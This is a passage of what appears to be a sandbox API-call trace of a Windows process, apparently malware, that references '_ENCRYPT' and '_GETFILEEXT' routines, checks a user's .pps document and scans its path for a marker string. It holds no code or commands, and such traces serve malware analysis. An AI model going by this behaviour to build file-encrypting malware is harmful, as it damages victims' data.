Flags=0x0, Size=0x10) returned 0x9b9fe8 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0170.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0170.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0170.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0170.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0170.705] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0170.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.706] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0170.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0170.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0170.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0170.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0170.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.706] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0170.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0170.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0170.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0170.707] CloseHandle (hObject=0x120) returned 1 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0170.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0170.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.708] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.709] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0170.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0170.709] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0170.709] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0170.709] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.709] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0170.709] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0170.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0170.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0170.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0170.710] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0170.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0170.713] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.714] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0170.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.714] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xa4489aa0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 0x90add8 [0170.714] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0170.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0170.715] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xa4489aa0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 0x90add8 [0170.715] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0170.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0170.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0170.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0170.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Im NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 